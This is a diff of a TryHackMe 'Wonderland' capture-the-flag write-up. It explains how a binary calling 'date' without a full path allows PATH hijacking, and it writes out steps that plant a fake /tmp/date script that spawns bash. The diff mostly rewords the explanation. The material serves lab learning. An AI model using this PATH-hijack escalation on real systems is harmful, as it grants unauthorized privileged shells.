n0sys/TryHackMe-Writeup/Wonderland/README.md

 $ ps -auxw | grep '41543'
 kali       41543  0.0  0.0   2524   400 pts/3    t    20:19   0:00 sh -c /bin/echo -n 'Probably by ' && date --date='next hour' -R
 ```
-So the program is executing a bash command!
-Its like we have a file ".sh" which is being run.
+We can see that the program is actually executing a bash command!
+Its like we are running a shell script.
 If we manipulate the environment path we execute whatever we want!
-The steps go as follows:
+The exploitation steps went as follows:
 ```bash
 rabbit@wonderland:/tmp$ echo "/bin/bash ; " > /tmp/date
 rabbit@wonderland:/home/rabbit$ /bin/chmod +x /tmp/date